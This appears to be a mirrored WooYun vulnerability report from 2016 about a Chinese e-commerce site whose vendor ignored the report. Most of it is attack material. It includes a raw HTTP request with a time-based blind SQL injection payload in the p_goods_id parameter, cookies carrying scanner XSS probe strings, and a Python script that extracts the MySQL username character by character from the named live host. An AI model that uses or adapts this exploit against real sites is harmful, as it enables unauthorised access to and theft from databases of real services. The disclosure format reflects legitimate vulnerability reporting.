乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-17: 细节已通知厂商并且等待厂商处理中 2016-01-22: 厂商已经主动忽略漏洞,细节向公众公开
POST /index.php/product-getAdjunctPro.html?ijfitnfo HTTP/1.1Content-Length: 306Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.lamiu.com/Cookie: vary=static6dcd7865027f12ffefb2873dc41498a4; s=0da89b7ebdf6f1bcb64c1abeb4e286e1; S[SIGN][REMEMBER]=1; S[CART_COUNT]=131; S[CART_NUMBER]=315; S[CART_TOTAL_PRICE]=%EF%BF%A529889.00; cart[go_back_link]=http%3A%2F%2Fwww.lamiu.com%2F; S[GALLERY][FILTER]=cat_id%3D147%26virtual_cat_id%3D9%26virtual_cat_id%3D9%26p_1%5B%5D%3D286%26p_1%5B%5D%3D287%26p_1%5B%5D%3D288%26p_1%5B%5D%3D289%26p_1%5B%5D%3D290%26p_1%5B%5D%3D291%26p_3%5B%5D%3D304%26p_3%5B%5D%3D305%26p_3%5B%5D%3D306%26p_3%5B%5D%3D307%26p_6%5B%5D%3D324%26p_6%5B%5D%3D325%26p_6%5B%5D%3D326%26p_6%5B%5D%3D327%26p_7%5B%5D%3D328%26p_7%5B%5D%3D329%26p_7%5B%5D%3D330%26p_7%5B%5D%3D331%26p_8%5B%5D%3D333%26p_8%5B%5D%3D334%26p_8%5B%5D%3D335%26p_8%5B%5D%3D336%26p_9%5B%5D%3D337%26p_9%5B%5D%3D338%26p_9%5B%5D%3D339%26p_10%5B%5D%3D340%26p_10%5B%5D%3D341%26p_10%5B%5D%3D342%26p_13%5B%5D%3D355%26p_13%5B%5D%3D356%26s_5%5B%5D%3D93%26s_5%5B%5D%3D161%26s_5%5B%5D%3D100%26s_5%5B%5D%3D134%26s_5%5B%5D%3D115%26s_5%5B%5D%3D96%26s_5%5B%5D%3D164%26s_5%5B%5D%3D104%26s_5%5B%5D%3D136%26s_5%5B%5D%3D102%26s_5%5B%5D%3D109%26s_5%5B%5D%3D92%26s_5%5B%5D%3D94%26s_5%5B%5D%3D95%26s_5%5B%5D%3D98%26s_5%5B%5D%3D99%26s_5%5B%5D%3D101%26s_5%5B%5D%3D103%26s_5%5B%5D%3D105%26s_5%5B%5D%3D106%26s_5%5B%5D%3D107%26s_5%5B%5D%3D108%26s_5%5B%5D%3D110%26s_5%5B%5D%3D111%26s_5%5B%5D%3D112%26s_5%5B%5D%3D113%26s_5%5B%5D%3D114%26s_5%5B%5D%3D116%26s_5%5B%5D%3D117%26s_5%5B%5D%3D118%26s_5%5B%5D%3D119%26s_5%5B%5D%3D120%26s_5%5B%5D%3D121%26s_5%5B%5D%3D122%26s_5%5B%5D%3D123%26s_5%5B%5D%3D124%26s_5%5B%5D%3D125%26s_5%5B%5D%3D126%26s_5%5B%5D%3D127%26s_5%5B%5D%3D128%26s_5%5B%5D%3D129%26s_5%5B%5D%3D130%26s_5%5B%5D%3D131%26s_5%5B%5D%3D132%26s_5%5B%5D%3D133%26s_5%5B%5D%3D135%26s_5%5B%5D%3D137%26s_5%5B%5D%3D138%26s_5%5B%5D%3D139%26s_5%5B%5D%3D140%26s_5%5B%5D%3D141%26s_5%5B%5D%3D142%26s_5%5B%5D%3D143%26s_5%5B%5D%3D144%26s_5%5B%5D%3D145%26s_5%5B%5D%3D146%26s_5%5B%5D%3D147%26s_5%5B%5D%3D148%26s_5%5B%5D%3D149%26s_5%5B%5D%3D150%26s_5%5B%5D%3D151%26s_5%5B%5D%3D152%26s_5%5B%5D%3D153%26s_5%5B%5D%3D154%26s_5%5B%5D%3D155%26s_5%5B%5D%3D156%26s_5%5B%5D%3D157%26s_5%5B%5D%3D158%26s_5%5B%5D%3D159%26s_5%5B%5D%3D160%26s_5%5B%5D%3D162%26s_5%5B%5D%3D163%26s_5%5B%5D%3D165%26s_5%5B%5D%3D166%26s_5%5B%5D%3D167%26s_5%5B%5D%3D168%26s_5%5B%5D%3D169%26s_5%5B%5D%3D170%26s_5%5B%5D%3D171%26s_5%5B%5D%3D172%26s_5%5B%5D%3D173%26s_5%5B%5D%3D174%26s_5%5B%5D%3D175%26s_5%5B%5D%3D176%26s_5%5B%5D%3D177%26s_5%5B%5D%3D178%26s_5%5B%5D%3D179%26s_5%5B%5D%3D180%26s_5%5B%5D%3D181%26s_5%5B%5D%3D182%26s_5%5B%5D%3D183%26s_5%5B%5D%3D184%26s_5%5B%5D%3D185%26s_5%5B%5D%3D186%26s_5%5B%5D%3D187%26s_5%5B%5D%3D188%26s_5%5B%5D%3D189%26s_5%5B%5D%3D190%26s_5%5B%5D%3D191%26s_5%5B%5D%3D192%26s_5%5B%5D%3D193%26s_5%5B%5D%3D194%26s_5%5B%5D%3D195%26s_5%5B%5D%3D196%26s_5%5B%5D%3D197%26s_5%5B%5D%3D198%26s_5%5B%5D%3D199%26s_5%5B%5D%3D200%26orderBy%3D%26showtype%3Dgrid%26; S[SEARCH_KEY]=%BE%DB%C2%A3; S[FIRST_REFER]=%7B%22ID%22%3A%22%22%2C%22REFER%22%3A%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%2C%22DATE%22%3A1452850458000%7D; S[NOW_REFER]=%7B%22ID%22%3A%22%22%2C%22REFER%22%3A%22http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%5C%22'%5C%5C%5C%22%3E%3Cxsstag%3E()refdxss%5C%22)%22%2C%22DATE%22%3A1452850475000%7D; S[N]=AE592E85-E439-5248-EDC3-26450F7541C5; Hm_lvt_35dfb17676caeb2ba818819534646912=1452852660,1452852863,1452852941,1452852941; Hm_lpvt_35dfb17676caeb2ba818819534646912=1452852941; HMACCOUNT=84BCA4D31DF03561; S[BRAND][FILTER]=brand_id%5B%5D%3D15%26orderBy%3Dprice%20desc%26showtype%3Dgrid%26page%3D1Host: www.lamiu.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*goods_id=5255&p_goods_id=if(now()=sysdate(),sleep(if(length(user())=24,3,0)),0)
user长度为24
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'Content-Type':'application/x-www-form-urlencoded'}payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())user = ''for i in range(1, 25): for payload in payloads: s = "if(now()=sysdate(),sleep(if(ascii(substr(user(),%s,1))=%s,5,0)),0)" % (i, ord(payload)) s = "goods_id=5255&p_goods_id="+s conn = httplib.HTTPConnection('www.lamiu.com', timeout=90) start_time = time.time() conn.request('POST','/index.php/product-getAdjunctPro.html?ijfitnfo',s,headers) h=conn.getresponse().read() conn.close() print '.', #print time.time() - start_time if time.time() - start_time > 5.0: user += payload print '\n\n[in progress]', user, break print '\n[Done] MySQL user is %s' % user
危害等级:无影响厂商忽略
忽略时间:2016-01-22 12:30
漏洞Rank:4 (WooYun评价)
暂无